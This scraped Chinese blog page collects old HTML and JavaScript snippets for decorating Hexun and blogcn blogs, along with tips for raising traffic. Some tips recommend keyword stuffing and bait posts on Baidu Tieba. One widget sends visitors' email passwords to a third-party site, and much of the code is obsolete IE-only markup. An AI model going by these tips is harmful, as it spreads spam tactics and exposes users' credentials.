http://815668.5151j.cn/qzone/28.swf http://815668.5151j.cn/qzone/29.swf www.qq5120.com http://815668.5151j.cn/qzone/30.swf http://815668.5151j.cn/qzone/31.swf http://815668.5151j.cn/qzone/32.swf http://815668.5151j.cn/qzone/33.swf http://815668.5151j.cn/qzone/34.swf http://815668.5151j.cn/qzone/35.swf http://815668.5151j.cn/qzone/36.swf http://815668.5151j.cn/qzone/37.swf http://815668.5151j.cn/qzone/38.swf http://815668.5151j.cn/qzone/39.swf http://815668.5151j.cn/qzone/40.swf | |
博客代码
(作者置顶)
博客代码
大家都对博客情有独衷,把一些代码发上来,希望大家的博客越做越好怎么添加背景音乐?
进入控制面版----首页内容维护----公告栏设置----勾选显示代码(这个是关键)
在公告栏编辑区输入以下代码(能正常播放的代码,字体必须为默认字体样式,颜色为黑色,不要擅自添加任何字体特效)
<embed src=音乐链接地址 width=0 height=0 type=audio/mpeg loop="true" autostart="false">
支持的音乐格式: wma mp3 rm ra ram asf mid.
width和height为播放器宽度和高度,可以灵活设置,如果播放视频,可以设置到适合的数字.我设的是200和50
autostart="true"为自动播放,autostart="false"为不自动播放.
loop="true"为连续循环播放,loop="false"为不循环播放.
loop可以等于一个整数,比如loop="3",就是音乐循环播放3次.
如果你想别人一打开网页就能听到你的背景音乐,并且是循环播放的,那么就可以这样。
怎样可以在BLOG中出现有水珠的效果?
建立一个空白面板,在显示源代码的状态下,把下面的代码粘贴进去:
<EMBED style="WIDTH: 378px; HEIGHT: 238px" src=http://www.kiaclub.cn/dvbbs/Images/sd.swf width=378 height=238 type=application/x-shockwave-flash wmode="transparent">
宽和高你可以自己调整。
如何在博客中插入天气预报和FLASH时钟?
新建空白面版,进入“原代码编辑”,插入以下代码即可。
<IFRAME src="http://weather.qq.com/inc/ss125.htm" frameBorder=0 width=200 scrolling=no height=240></IFRAME>
FLASH时钟跟插入FLASH一样。代码格式
<div align="center"><embed src="FLASH地址" width="180" height="180" type="application/x-shockwave-flash" /></div>
FLASH时钟可以到http://www.fengzhuju.com/page-00s/wzgg/clocks.htm里挑。
挑好了复制地址(都是.swf结尾的)替代上面的“FLASH地址就行”。
注意,存放FLASH的服务器的快慢影响你的博客浏览速度。
blog代码集
(作者置顶)
最小化、最大化、关闭窗口
<object id=hh1 classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Command" value="Minimize"></object>
<object id=hh2 classid="clsid:ADB880A6-D8FF-11CF-9377-00AA003B7A11">
<param name="Command" value="Maximize"></object>
<OBJECT id=hh3 classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11">
<PARAM NAME="Command" value="Close"></OBJECT>
<input type=button value=最小化 onclick=hh1.Click()>
<input type=button value=最大化 onclick=hh2.Click()>
<input type=button value=关闭 onclick=hh3.Click()>
本例适用于IE
记录并显示网页的最后修改时间
<script language=JavaScript>
document.write("最后更新时间: " + document.lastModified + "")
</script>
2秒后关闭当前页
<script language="JavaScript">
<!--
setTimeout('window.close();',2000);
-->
</script>
2秒后载入指定网页
<head>
<meta http-equiv="refresh" content="2;URL=http://你的网址">
</head>
添加到收藏夹
<Script Language="JavaScript">
function bookmarkit()
{
window.external.addFavorite('http://你的网址','你的网站名称')
}
if (document.all)document.write('<a href="#" onClick="bookmarkit()">加入收藏夹</a>')
</Script>
禁止鼠标右键的动作
<Script Language = "JavaScript">
function click() { if (event.button==2||event.button==3)
{
alert('禁止鼠标右键');
}
document.onmousedown=click // -->
</Script>
或
<script language="JavaScript">
function click() { if (event.button==2)
{alert('*^_^*'); } } document.onmousedown=click // -->
</script>
设置该页为首页
<body bgcolor="#FFFFFF" text="#000000">
<a class="chlnk" style="cursor:hand" HREF onClick="this.style.behavior='url(#default#homepage)'; this.setHomePage('你的网站名称);"><font color="000000" size="2" face="宋体">设为首页</font></a>
</body>
节日倒计时
<Script Language="JavaScript">
var timedate= new Date("October 1,2002");
var times="国庆节";
var now = new Date();
var date = timedate.getTime() - now.getTime();
var time = Math.floor(date / (1000 * 60 * 60 * 24));
if (time >= 0)
document.write("现在离"+times+"还有: "+time +"天")
</Script>
单击按钮打印出当前页
<Script Language="JavaScript">
if (window.print) {
document.write('<form>'
+ '<input type=button name=print value="打印本页" '
+ 'onClick="javascript:window.print()"></form>');
}
</Script>
单击按钮‘另存为’当前页
<input type="button" name="Button" value="保存本页" onClick="document.all.button.ExecWB(4,1)">
<object id="button" width=0 height=0 classid="CLSID:8856F961-340A-11D0-A96B-00C04FD705A2">
<embed width="0" height="0"></embed>
</object>
显示系统当前日期
<script language=JavaScript>
today=new Date();
function date(){
this.length=date.arguments.length
for(var i=0;i<this.length;i++)
this[i+1]=date.arguments }
var d=new date("星期日","星期一","星期二","星期三","星期四","星期五","星期六");
document.write(
"<font color=##000000 style='font-size:9pt;font-family: 宋体'> ",
today.getYear(),"年",today.getMonth()+1,"月",today.getDate(),"日",
d[today.getDay()+1],"</font>" );
</script>
不同时间段显示不同问候语 <Script Language="JavaScript">
var text=""; day = new Date( ); time = day.getHours( );
if (( time>=0) && (time < 7 ))
text="夜猫子,要注意身体哦! "
if (( time >= 7 ) && (time < 12))
text="今天的阳光真灿烂啊,你那个朋友呢?"
if (( time >= 12) && (time < 14))
text="午休时间。您要保持睡眠哦!"
if (( time >=14) && (time < 18))
text="祝您下午工作愉快! "
if ((time >= 18) && (time <= 22))
text="您又来了,可别和MM聊太久哦!"
if ((time >= 22) && (time < 24))
text="您应该休息了!"
document.write(text)
</Script>
水中倒影效果 <img id="reflect" src="你自己的图片文件名" width="175" height="59">
<script language="JavaScript">
function f1()
{
setInterval("mdiv.filters.wave.phase+=10",100);
}
if (document.all)
{
document.write('<img id=mdiv src="'+document.all.reflect.src+'"
style="filter:wave(strength=3,freq=3,phase=0,lightstrength=30) blur() flipv()">')
window.onload=f1
}
</script>
慢慢变大的窗口 <Script Language="JavaScript">
<!--
var Windowsheight=100
var Windowswidth=100
var numx=5
function openwindow(thelocation){
temploc=thelocation&, amp;, nbsp;
if
(!(window.resizeTo&&document.all)&&!(window.resizeTo&&document.getElementById))
{
window.open(thelocation)
return
}
windowsize=window.open("","","scrollbars")
windowsize.moveTo(0,0)
windowsize.resizeTo(100,100)
tenumxt()
}
function tenumxt(){
if (Windowsheight>=screen.availHeight-3)
numx=0
windowsize.resizeBy(5,numx)
Windowsheight+=5
Windowswidth+=5
if (Windowswidth>=screen.width-5)
{
windowsize.location=temploc
Windowsheight=100
Windowswidth=100
numx=5
return
}
setTimeout("tenumxt()",50)
}
//-->
</script>
<a href="javascript:openwindow('http://www.webjx.com')">进入</a>
鼠标指向时弹出信息框
在<body></body>之间加上如下代码: <a href onmouseover="alert('弹出信息!')">显示的链接文字</a>
随机变换背景图象(一个可以刷新心情的特效)
在<head></head>之间加上如下代码:
<Script Language="JavaScript">
image = new Array(4); //定义image为图片数量的数组
image [0] = 'tu0.gif' //背景图象的路径
image [1] = 'tu1.gif'
image [2] = 'tu2.gif'
image [3] = 'tu3.gif'
image [4] = 'tu4.gif'
number = Math.floor(Math.random() * image.length);
document.write("<BODY background="/+image[number]+">");
</Script>
鼠标一碰就给颜色看的链接 在<body></body>之间加上如下代码:
<p onMouseMove="anniu()">你敢碰我,我就给点颜色你看!</p>
<Script Language = "VBScript">
sub anniu
document.fgColor=int(256*256*256*rnd)
end sub
</Script>
从天而降并有幻影效果的窗口
<head>
<Script language="JavaScript">
function move(x) {
if(self.moveBy){
self.moveBy (0,-800);
for(i = x; i > 0; i--)
{
self.moveBy(0,3);
}
for(j = 200; j > 0; j--){ //如果你认为窗口抖动厉害,就200换成个位数
self.moveBy(0,j);
self.moveBy(j,0);
self.moveBy(0,-j);
self.moveBy(-j,0);
}
}
}
</Scrip>
<body bgColor=#ffffff onload=move(280)>
</body>
</head>
表格的半透明显示效果 在<head></head>之间加上如下代码:
<style>
.alpha{filter: Alpha(Opacity=50)} //50表示50%的透明度
</style>
在<body></body>之间加上如下代码:
<table border="1" width="100" height="62" class="alpha" bgcolor="#F2A664" >
<tr>
<td width="100%" height="62">
<div align="center">很酷吧!</div>
</td>
</tr>
</table>
锁定状态栏文字防止显示地址
<body onmouseover="self.status='文字';return true">
禁止图片下载
在<body......>这里的最后加入:
oncontextmenu="return false" ondragstart="return false" onselectstart="return false" scroll="auto"
禁止缓存
<meta http-equiv="Expires" CONTENT="0">
<meta http-equiv="Cache-Control" CONTENT="no-cache">
<meta http-equiv="Pragma" CONTENT="no-cache">
加在HEAD里
使用包含页面
加密所包含页面地址,使用工具 htmlguardian5.3.5
目前功能最强的html代码加密软件,可以保护连接和html代码被盗。1.锁右键。2.禁鼠标圈选。3.不允许离线使用。4.密码保护。5.不显示状态栏url地址。6.全代码 或 局部代码保护。7.链接跟踪。8.禁止打印(IE5+)。9.压缩代码( 未加密前)。10.可加密*.html *.js *.asp *.vbs。11.两种不同加密算法。12.加密 frameset 结构。13.某些功能支持几个不同版本的浏览器。
下载flash我的三种方法:
--查看源文件,找出flash的绝对路径,复制,在flashget(或蚂蚁)中点任务
,然后点新建下载任务即可。
--在IE的临时文件夹Temporary Internet Files里把所有的东西都删掉,然后
刷新你想要下载flash的网页,即可得到你所要的flash
--使用外部软件,推荐使用Flash Catcher,安装后只需在你所要下载的flash上右键,save即可。
让IFRAME框架内的文档的背景透明
<iframe src="about:<body style='background:transparent'>" allowtransparency></iframe>
进入页面后立即自动刷新?
<meta http-equiv="refresh" content="120;url=http://www.webjx.com/">
http://www.webjx.com/,这是你自己的网址。
打开窗口即最大化
<script language="JavaScript">
<!-- Begin
self.moveTo(0,0)
self.resizeTo(screen.availWidth,screen.availHeight)
// End -->
</script>
能隐藏IFRAME的滚动条吗?我知道的三种方法:
1. 设置iframe scrolling="no"
2. 被包含页body应用overflow:hidden
3. 被包含页的body标签加scroll="no"
加入背景音乐
<bgsound src="mid/windblue[1].mid" loop="-1"> 只适用于IE
<embed src="music.mid" autostart="true" loop="true" hidden="true">
对Netscape ,IE 都适用
嵌入网页
<iframe name="tt" src="/01a.html" width="450" height="287" scrolling="Auto" frameborder="0"></iframe>
跳转
<meta http-equiv="refresh" content="3;URL=list.htm">
滚动
<MARQUEE direction=up height=146 onmouseout=start() onmouseover=stop() scrollAmount=4>
</marquee>
细线分隔线
<hr noshade size=0 color=#C0C0C0>
过度方式
<meta http-equiv="Page-Exit" content="revealTrans(Duration=3,Transition=5)">
Duration的值为网页动态过渡的时间,单位为秒。
Transition是过渡方式,它的值为0到23,分别对应24种过渡方式。如下表:
0 盒状收缩 1 盒状放射
2 圆形收缩 3 圆形放射
4 由下往上 5 由上往下
6 从左至右 7 从右至左
8 垂直百叶窗 9 水平百叶窗
10 水平格状百叶窗 11垂直格状百叶窗
12 随意溶解 13从左右两端向中间展开
14从中间向左右两端展开 15从上下两端向中间展开
16从中间向上下两端展开 17 从右上角向左下角展开
18 从右下角向左上角展开 19 从左上角向右下角展开
20 从左下角向右上角展开 21 水平线状展开
22 垂直线状展开 23 随机产生一种过渡方式
如何控制横向和纵向滚动条的显隐?
<body style="overflow-y:hidden"> 去掉x轴
<body style="overflow-x:hidden"> 去掉y轴
<body scroll="no">不显
定义本网页关键字,可以在<Head></Head>中加入如下代码: <meta name="Keywords" content="china,enterprise,business,net">
Content 中所包含的就是关键字,你可以自行设置。
这里有个技巧,你可以重复某一个单词,这样可以提高自己网站的排行位置,如:
<meta name="Keywords" content="china,china,china,china">
IE5.0 的部分快捷键:
A:打开查找功能:Ctrl+F
关闭浏览器窗口:Ctrl+W
打开地址栏下拉列表框:F4
刷 新:F5
将当前Web页保存到收藏夹列表:Ctrl+D
打开当前 IE 窗口的一个拷贝:Ctrl+N
停止下载当前网页:Esc
光标迅速移动到网页的开头:Home
光标迅速移动到网页的尾部:End
打开新的地址键入窗口:Ctrl+O
打开收藏夹:Ctrl+I
打开历史记录文件夹:Ctrl+H
打开浏览器设定的默认主页:Alt+HOME
添加到收藏夹:
<a href="javascript:window.external.addFavorite('http://链接','说明');">添加到收藏夹</a>
设为首页:
<a href=# onclick=this.style.behavior='url(#default#homepage)';this.setHomePage ('http://链接');>设为首页</a>
定制浏览器地址栏前的小图标:
A:在网页的<head></head>间加入以下语句
<link rel="shortcuticon" href="http://…/icon.ico">
即可。其中 icon.ico 为 16x16 的图标文件,
颜色不要超过 16 色。
把滚动条放在浏览器窗口的左边
A:在 <body> 中加 dir=RTL,即 <body dir=RTL>。
让背景图不滚动
IE浏览器支持一个 Body 属性 bgproperties,它可以让背景不滚动:
<Body Background="图片文件" bgproperties="fixed">
删除确认:
<input type="button" name="DEL" onclick="{if(confirm('确认删除么?')){location.href="/xxx.asp";}return false;}" value="ON" >
隐藏状态栏中的链接地址:
<script language="javascript">
kstatus();
function kstatus(){
self.status="GBlog () ";
setTimeout("kstatus()",0);
}
</script>
自定义指定区域的文字大小:
<div id=zoom>sdrrrrrrrrrrrrrrrrrrrrrrrrrrrrr</div>
【<A href="javascript:doZoom(16)">大</A> <A href="javascript:doZoom(14)">中</A> <A href="javascript:doZoom(12)">小</A>】
<SCRIPT language=JavaScript>
function doZoom(size){
document.getElementById('zoom').style.fontSize=size+'px'
}
</script>
Input输入框文字效果:
<input type="text" value="123456" style="FONT-size:38px;color:red;font-family:arial black">
通过层来实现渐淡淡出
<script language="JavaScript1.2">
function makevisible(cur,which){
if (which==0)
cur.filters.alpha.opacity=100
else
cur.filters.alpha.opacity=50
}
</script>
<div style="width:200px;height:200px;filter:alpha(opacity=50);border:1px solid #000;background:#efefef" onMouseOver="makevisible(this,0)" onMouseOut="makevisible(this,1)">
ywicc.com
</div>
网页屏保
<script language="JavaScript">
function screensave(){
test.value++;
if(test.value==5){
test.style.display='none';
document.all[4].bgColor='black';
}
}
function screenopen(){
test.value=0;
test.style.display='';
document.all[4].bgColor='';
}
</script>
<body onkeydown="screenopen()" onmousemove="screenopen()" onload="setInterval('screensave()',1000)">
5 秒屏保<input id="test">
让标题动态
<script>
<!--
var tx = new Array (
"◇:::::::网页教学网http://www.webjx.com:::::::◇欢迎您!◇",
"◆欢迎大家光临网页教学网网站!◆",
"◆大量供应网页制作教材,资料,源代码,网页制作软件,相关插件光盘!◆",
"◆最可怕的敌人,就是没有坚强的信念!◆",
"◆应该让别人的生活因为有了你的生存而更加美好!◆"
);
var txcount=5;
var i=1;
var wo=0;
var ud=1;
function animatetitle()
{
window.document.title=tx[wo].substr(0, i)+"_";
if (ud==0) i--;
if (ud==1) i++;
if (i==-1) {ud=1;i=0;wo++;wo=wo%txcount;}
if (i==tx[wo].length+10) {ud=0;i=tx[wo].length;}
// if (window.document.title.length < 20 ) window.document.title=window.document.title+"-";
// if (window.document.title.length == 20 ) window.document.title=window.document.title+"]";
// if (window.document.title.length == 21 ) setTimeout("window.document.title='Animierte Seitentitel '; ",1000);
parent.window.document.title=tx[wo].substr(0, i)+"_";
setTimeout("animatetitle()",100);
}
animatetitle();
// --></script><script language="JavaScript">
<!--
function MM_openBrWindow(theURL,winName,features) { //v2.0
window.open(theURL,winName,features);
}
//-->
</script>
隐去浏览器中当鼠标移到图片上跳出的工具栏
<img galleryimg="no">
或者
<head>
<meta http-equiv="imagetoolbar" content="no">
</head>
在form中只有input输入框的情况下...在这个input输入框中按enter进行提交表单
<form onsubmit="if(event.srcElement.name=='bb'){this.submit()}else{return false}">
<input name=a size=20>
<input type=button name=bb onclick="submit();">
</form>
删除确认
<input type="button" value="删除" onclick="{if(confirm('确认删除么?')){location.href="/aa.asp";}return false;}">
或
<a href="/aa.asp" onclick="{if(confirm('确定删除吗?')){return true;}return false;}">删除</a>
或
<a href="/del.asp" onclick="return confirm('该删除操作将无法恢复!是否继续?')">删除</a>
返回页面顶部:
javascript:window.scroll(0,0)
离开页面时弹出警告:
<BODY onbeforeunload="checkclose()">
<SCRIPT>
function checkclose(){
event.returnValue = "测试啊" //XXX可以改为任何文本信息也可以是空
}
</SCRIPT>
<a href="/a.asp">aa</a>
博客
(作者置顶)
提升浏览和讯博客网速篇
1.自己的博客不要加太多的悬挂物
比如像我的博客加了好听的背景音乐后,每次更新我的
博客页面时都非常卡,如果实在想加,但是又不知道代码,
那请你继续往下看,我在后面会介绍
2.如果没什么活动,尽量在自己的个人门户呆着
大家是否都注意到进入自己的博客相对于个人门户来说,有些卡
所以说为省点网速你就留在你的门户里吧
3.你想更新看看你的博客访问量,又不想占用太多的网速
找一个你字数比较少的主题打开,比如http://jayzjz.blog.hexun.com/2268325_d.html
我就来回刷新这个主题,但是刷新之意是看访问量更新到多少了
如果刷新我的博客主页的话,因为有很多文章,刷新一次会非常卡
也影响自己的网速,所以腿夹大家可以使用这种办法
4.想连续多发些主题
点管理,进入后点发表主题,这样发完一个主题又回到了文章管理的页面,这种做法也很省网速
5.把你的博客左边好友栏从博客中移出
点管理,常规设置,然后最下边有不想在首页显示好友,
把勾去了就行,否则有的人几百个好友显示起来也太长了,也没什么意义
提高人气篇
1.如何能让更多人来知道自己的博客
这个我来说说自己的经验,因为平时也在玩论坛,这个就和宣传别人
进你的论坛是有联系的
(1)首先保证你的博客里要有很精的帖子,这样
容易让你一炮走红,何谓好帖子呢?就是别人看完你的帖子觉得不错
之后不会马上关掉你的博客,浏览你博客上其他的文章,如果做到这个
效果说明你很成功
(2)贴一个好帖子后加强宣传
我一般贴个好贴后把链接地址复制了然后在QQ上发给别人看,当然是自己
值得信赖的朋友,否则有的人对你的地址不理喻
其次可以去百度贴吧之类的比较聚人气的地方做宣传
比如你可以去超级女生吧,周杰伦吧发关于他们相关的主题到你的博客
然后再百度贴吧发贴提供链接地址,让他们想看到丰富的内容
不得不点你的文章地址进来,我就用过这种方法,有时10分钟自己的贴被
点50下,不过一般这种帖子基本会引来吧主的删贴,不过你想做到
更高明些,可以在前边多打点内容,在最后标上想看更多资讯
请来XXXX.blog.hexun.com的字样
且你在贴吧发的主题一定要比较新的,比如你现在去超级女生吧
发贴说李宇春得了超级女生第一名,这种过时的主题名是不会吸引
别人的注意力的
3 .上别的论坛时候把自己签名档加上博客链接地址
| |
例如可以这样自己做图作为自己签名档
很多人看到后也会不经意输入你的博客地址来看看
4.标签TAG大众化
尽量把自己的TAG大众化一些,这样也是便于系统管理员会在这类的
文章中找到你的好文章便于作推荐,你的博客的访问量也会大增
5.多加些和讯博客的好友
朋友多了,你也会去更多的朋友那里学习他们是怎么做博客的
本着友谊,交流,发展的态度去学习,去交流,还有朋友多了,会有
很多人可能在个人门户中在好友栏中点进你的博客
6.确保个人门户的头像要精美
经研究发现头像漂亮的,一般很多人都愿意在那么多好友中
点你的博客看看
7.多和朋友做友情链接
有的朋友和你做了友情链接后就会多来你的博客参观,你的访问量
也会增大,如果有能力的话,可以试着和些网站,论坛作友情链接
装点博客篇
1.博客自我介绍中如何把字体变漂亮
我有个非常好的方法,如何能获取这些代码呢,就是你点发表文章,然后
在正文打上后,点代码,会加了很多东西,你把这些代码复制下来就OK
比如我主页上的:
<span style="FONT-SIZE: 14pt; COLOR: red">
<p>如果认为我的博客好</p>
<p>喜欢我的博客就做个友情链接吧</p>
<p>做完后在我的博客上留言给我</p>
<p>名称:11月的萧邦</p>
<p>地址:blog.hexun.com/jayzjz</p>
<p>欢迎RSS订阅此站</p>
<p>欢迎您加我为好友</p>
2.钟表的代码是什么?
<embed src="http://www.clocklink.com/clocks/Bloguru001-Blue.swf?TimeZone=GMT-0400" width="150" height="150" wmode="transparent" type="application/x-shockwave-flash">
3.想加个图片
</span>
<img src="http://photo.hexun.com/p/2006/0112/8798/m_B08A55CDEBFF19A0.jpg" border=0>
把中间的网址替换就OK了
4.想加个音乐作为背景音乐
<embed name=MediaPlayer1 pluginspage=http://www.microsoft.com/Windows/MediaPlayer src="http://disc.9music.cn/5cd/388/15/5.wma" width=150 height=100 type=application/x-mplayer2 showcontrols="1" autostart="1"></embed>
把中间的http://disc.9music.cn/5cd/388/15/5.wma替换
5.加天气预报
</embed>
<DIV></DIV><IFRAME src="http://weather.qq.com/inc/ss125.htm" frameBorder=0 width=200 scrolling=no height=240></IFRAME>
6. 登陆邮箱快捷窗口
<form name=loginmail onsubmit='return chkinput2(this);' action=http://www.hao123.com/sendmail.php method=post target=_blank>
邮箱登录:
帐号:
<input tabindex=1 size=14 name=user class='lanyu'>
密码:
<input class='lanyu' tabindex=3 type=password size=13
name=pass>
邮箱:
<select tabindex=2 size=1 name=site class='lanyu'>
<option value selected>请选择信箱</option>
<option value=21cn.com>@21cn.com</option>
<option value=163.net>@163.net</option>
<option value=tom.com>@tom.com</option>
<option value=163.com>@163.com</option>
<option value=vip.163.com>@vip.163.com</option>
<option value=sohu.com>@sohu.com</option>
<option value=263.net>@263.net</option>
<option value=sina.com>@sina.com</option>
<option value=vip.sina.com>@vip.sina.com</option>
<option value=mail.china.com>@mail.china.com</option>
<option value=china.com>@china.com</option>
<option value=netease.com>@netease.com</option>
<option value=yeah.net>@yeah.net</option>
<option value=etang.com>@etang.com</option>
<option value=bliao.net>@bliao.net</option>
<option value=cn.yahoo.com>@yahoo.com.cn</option>
<option value=xinhuanet.com>@xinhuanet.com</option>
<option value=126.com>@126.com</option>
<option value=eyou.com>@eyou.com</option>
<option value=email.com.cn>@email.com.cn</option>
<option value=ynmail.com>@ynmail.com</option>
<option value=citiz.net>@citiz.net</option>
<option value=elong.com>@elong.com</option>
</select>
<input style=FONT-SIZE:12px class='button' tabindex=4 type=submit value=立即登录邮箱
name=Submit2 onClick=setTimeout('clearpass()',1000)>
</form>
7.加百度搜索栏
<iframe id="baiduframe" border="0" vspace="0" hspace="0" marginwidth="0" marginheight="0"
framespacing="0" frameborder="0" scrolling="no" width="140" height="75"
src="http://unstat.baidu.com/bdun.bsc?tn=yy0736&csid=105&rkcs=0&bgcr=FEF0E2&ftcr=663300&rk=1&bd=1&bdas=0">
</iframe>
8.加GOOGLE搜索栏
</script>
<!-- Search Google -->
<center>
<form method="get" action="http://www.google.com/custom" target="google_window">
<table bgcolor="#ffffff">
<tr><td nowrap="nowrap" valign="top" align="left" height="32">
<a href="http://www.google.com/">
<img src="http://www.google.com/logos/Logo_25wht.gif" border="0" alt="Google" align="middle"></img></a>
<br/>
<input type="text" name="q" size="20" maxlength="255" value=""></input>
<input type="submit" name="sa" value="搜索"></input>
<input type="hidden" name="client" value="pub-9597356220042692"></input>
<input type="hidden" name="forid" value="1"></input>
<input type="hidden" name="ie" value="GB2312"></input>
<input type="hidden" name="oe" value="GB2312"></input>
<input type="hidden" name="cof" value="GALT:#008000;GL:1;DIV:#336699;VLC:663399;AH:center;BGC:FFFFFF;
LBGC:336699;ALC:0000FF;LC:0000FF;T:000000;GFNT:0000FF;GIMP:0000FF;FORID:1;">
</input>
<input type="hidden" name="hl" value="zh-CN"></input>
</td></tr></table>
</form>
</center>
<!-- Search Google -->
9.博客介绍栏文字滚动,可是设置为向上、向下、向左、向右。可以设置高度,滚动速度。
<MARQUEE scrollAmount=1 direction=up height=120>你的文字介绍</MARQUEE >
说明:scrollAmount=1,1就是文字滚动的速度
direction=up ,up就是方向,down是向下,left向左,right向右。
height=120,120是高度
10.状态栏滚动文字介绍 blog装修 12.从blogworld转来的图片,重要的不是那些图图,而是他介绍的每段代码都是干什么用的,以后方便修改 或者www.blogworld.com都有提供
没事闲得整理整理,也许什么时候会对什么朋友有些帮助~来这里的朋友需要什么样子的东西可以在这里留言啦,我尽量解决,自己不知道就去找找,呵呵~
说明:代码一般都加在代码编辑里~,用到可视化编辑模板时会说明^^
13.为别人找的一些代码网站,要各种效果的可以看看,不过有些代码重复~
http://www.dabaoku.com/texiao/
http://www.baron.com.cn/javascript/
http://www.helpor.net/ 这里的东西不多
http://www.7wind.net/wytx/wytx.htm
http://www.8695.com/netweb/
http://xzt.98888.net/bbss/336/yanse.html 修改滚动栏颜色







11.博客模板修改基础教程--代码介绍篇 [转]
1,表格的基本语法
<table>...</table> - 定义表格 <tr> - 定义表行 <th> - 定义表头 <td> - 定义表元(表格的具体数据)
其中还有一些属性设置:
class=提前设置好的样式方案(以后会做详细介绍) vAlign=对齐方式 bgColor=背景颜色 height=高度 width=宽度 background=背景图片的URL(连接地址) border=边框宽度
2,插入图片的基本语法
<img src="图片的URL" alt="图片的文字介绍,鼠标放在上面时会显示,或者图片如果无法打开则显示文字" align=对齐方式>
3,行的控制
段(Paragraph) (可以看作是空行) <p>
例如:
代码:你好吗?<p>很好。
显示:你好吗?
很好。
换行 <br>
例如:
代码:你好吗?<br>很好。
显示:你好吗?
很好。
4,连接的基本语法:
<a href="/URL">连接的文字介绍(页面上将显示这部分内容,可以在这里加入图片代码,即可实现图片连接)</a>
5,定义文字:
<DIV class=先前设置好的样式 align=对齐方式>需要定义的文字</DIV>
10.也是一个小点,和logo有关的
无论是文字链接还是图片logo,其实都是超链接,所以做友情链接的时候不一定非要在模版规定的地方,也不一定非要用blogcn提供的功能,只要在可视化编辑里插入文字或者图片,并用超链接对其定向都可以作为友情链接的。所以链接放在哪里是随心所欲的^^
用blog提供的功能添加自己的logo之后blogcn会在你的logo上自动加上一个flash广告,解决的方法也就和图片超链接一样咯
9.最近看到有的人似乎对帮助利的一些细节还是看不太明白,这次没什么新的,加一点说明而已
a.还是那个添加背景音乐的代码,帮助里说的body区域并不是加上一个body,而是在和之间加入代码,这种对称结构也让html语言更显得简单了~大多数论坛上用得ubb代码也够和这个一样,因为就是html的简化版
b.在blogcn的论坛上看到有人问关于背景固定的东西,其实所有的背景都是可以固定的,没有什么模版之分
body{ background-attachment: fixed; background-repeat: no-repeat; background-image: url(" 图片地址 "}
这个就是固定且不重复的背景图片代码了,只要是fixed就是固定了~关于背景图片还有更详细的介绍在以前也转载过,想看的朋友可以向前翻看看^^
8.飘花特效(个人感觉对于背景为白色的比较好)
<Script language=JavaScript src="
http://www.blogcn.com/images/bellflc/Sakura.js"></Script>
7. 各种样式的光标
auto :标准光标
default :标准箭头
hand :手形光标
wait :等待光标
text :i形光标
vertical-text :水平i形光标
no-drop :不可拖动光标
not-allowed :无效光标
help :?帮助光标
all-scroll :三角方向标
move :移动标
crosshair :十字标
6..<div><span>&<layer>的区别?
<div>(division)用来定义大段的页面元素,会产生转行
<span>用来定义同一行内的元素,跟<div>的唯一区别是不产生转行
<layer>是ns的标记,ie不支持,相当于<div>
5.大概是屏蔽了鼠标右键,加在head和end之间就行
<body oncontextmenu="return false"
ondragstart="return false"
onselecstart="return false">
4.更改页面背景图片
body{ background-attachment: fixed; background-repeat: no-repeat; background-image: url(" 图片地址 "
; }
这样就能把你自己喜欢的图片设置成背景了。
本段代码其他要解: (直接加在body{}l里面就好)
background-attachment: fixed 背景固定
background-repeat: no-repeat 背景不重复
background-image: url() 背景图片地址
background-position: right bottom 背景右下角基准对齐
repeat : 背景图像在纵向和横向上平铺
no-repeat : 背景图像不平铺
repeat-x : 背景图像在横向上平铺
repeat-y : 背景图像在纵向平铺
但是,更重要的是,很多同学都没有注意到,光象上面那样加背景是不够的。因为大背景只是叶子的最底下一层,在它的上面还有放置具体内容(比如文字、小图片)的表格。而这些表格也是可以设置背景牙颜色和图片的。
所以,即使你改了大背景,只要这些置于上层的表格里有自己的背景颜色或者图片,那么还是把大背景遮住了。(所以有些同学虽然改了大背景,但是看不到效果就是因为这样了。)
简言之,同学们要看见大背景,首先还要做一个去掉表格里背景颜色或者图片的工作。也就是叶子透明。
要解
关于叶子透明
bgcolor 背景颜色
background-image 背景图片为
img src= 插入一张图片为
所以只要去掉这些,(当然有些是必要的,比如背景,小的icon图标可以保留。自己尝试咯),叶子就透明了。
3.静态,动态鼠标代码
<STYLE type=text/css>
a:hover {cursor:url("触碰链接时鼠标地址"}
BODY {cursor:url("普通状态时鼠标地址"}
</STYLE>
注:本鼠标为图片,静态为.cur动态为.ani,均须自己制作,静态略容易,动态较繁,且支持空间不多
2.如何添加背景音乐?
a.如果只想添加一首歌,则可用blogcn帮助中提供的
·到“我的控制面板”后,选择“编辑模板”里的代码编辑
·在BODY区域加<bgsound src=”音乐地址” loop=”-1”>
注意:音乐格式一定要为mp3或wma(推荐wma),loop后面为循环的次数,-1位无限次数循环。
b.如果是多首歌曲,则可以去搜索提供音乐播放器的网站,例如
http://www.07j.com/player/index.asp,
注意:一般嵌入式播放器都最多支持60首歌,blogworld不限曲目,但不能自动跳坏歌,随机程度也不是很好。
tips:从自己本地用cd压制wma格式声音文件,上传至tom玩乐吧并获取地址,得到的效果不错^^
1.其实blogcn的帮助对新手很有帮助的,比如最基本的HTML标签简明教以及比较有用的如何为自己的BLOG建立BLOG内部搜索功能,鼠标改变形状,如何设置模板的背景颜色?等等,先去看看应该会有些收获。
自左向右,循环滚动。
<script>
<!--
function Helpor_net(seed)
{ var m1 = "你要显示的文字,如:站长如果依然欢迎来到成长の代价" ;
var m2 = "" ;
var msg=m1+m2;
var out = " ";
var c = 1;
var speed = 120;
if (seed > 100)
{ seed-=2;
var cmd="Helpor_net(" + seed + ")";
timerTwo=window.setTimeout(cmd,speed);}
else if (seed <= 100 && seed > 0)
{ for (c=0 ; c < seed ; c++)
{ out+=" ";}
out+=msg; seed-=2;
var cmd="Helpor_net(" + seed + ")";
window.status=out;
timerTwo=window.setTimeout(cmd,speed); }
else if (seed <= 0)
{ if (-seed < msg.length)
{
out+=msg.substring(-seed,msg.length);
seed-=2;
var cmd="Helpor_net(" + seed + ")";
window.status=out;
timerTwo=window.setTimeout(cmd,speed);}
else { window.status=" ";
timerTwo=window.setTimeout("Helpor_net(100)",speed);
}
}
}
Helpor_net(100);
-->
</script>
11: 状态栏文字打字机效果特效
<script language="JavaScript">
var msg = "你要显示的文字,如:站长如果依然欢迎来到成长の代价" ;
var interval = 120
var spacelen = 120;
var space10=" ";
var seq=0;
function Helpor_net() {
len = msg.length;
window.status = msg.substring(0, seq+1);
seq++;
